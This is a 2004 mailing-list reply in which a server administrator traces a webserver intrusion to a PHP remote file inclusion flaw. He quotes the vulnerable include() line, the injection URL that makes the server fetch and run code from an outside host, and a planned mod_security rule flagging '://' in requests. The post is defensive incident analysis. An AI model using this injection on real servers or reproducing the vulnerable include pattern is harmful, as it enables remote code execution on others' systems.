Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)

["nathan c. dickerson" <nathan () pro net>]

Greetings!

Thanks for the reply. I am abit relieved to say I've found the point of 
entry via an include() injection.

The code was:
include($PAGE.".php");

On one of the custom scripts on the server.

Since remote fopen and register globals was enabled, this was injectable 
via passing:

index.php?page=http://remote.server.com/exploit

which expands to include("http://remote.server.com/exploit.php";)

If the remote server served the php file as plain text, the script would 
be included and executed. It doesn't leave any useful logs either.
I've now got to find away to disable remote file includes, while keeping 
the remote fopen functionality, which is required by some of the scripts 
on the server.

Definitly going to get mod_security logging any php requests with "://" 
in the get, post, or even cookie.

Thanks for the replies

Nathan

Dmitry Alyabyev wrote:

> On Saturday 10 July 2004 04:40, Tim Greer wrote:
>
> [skip]
>
>  
>
> > Sounds like one of the many PHP scripts is exploitable.  You could run
> > PHP as CGI w/ the suexec wrapper (and even tweak the source or use an
> > existing patch so PHP scripts don't need to be modified at all (other
> > than the ownership of some files/dirs PHP scripts need to use/write to).
> >    
>
> not really - you will lose authentication within PHP scripts in meaning of 
> receiving password via environment and some add-ons like Zend optimizer will 
> stop working
>
>